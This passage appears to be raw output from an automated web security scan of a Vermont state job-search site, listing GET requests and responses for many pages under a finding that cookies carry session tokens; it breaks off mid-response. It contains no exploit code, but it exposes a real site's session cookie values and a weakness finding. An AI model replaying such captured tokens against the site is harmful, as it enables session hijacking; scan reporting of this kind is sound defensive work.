"http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:11:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/leavesite.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:14:18 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:20 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache location: mn_empagreement_dsp.cfm Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> <!-- Caching is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 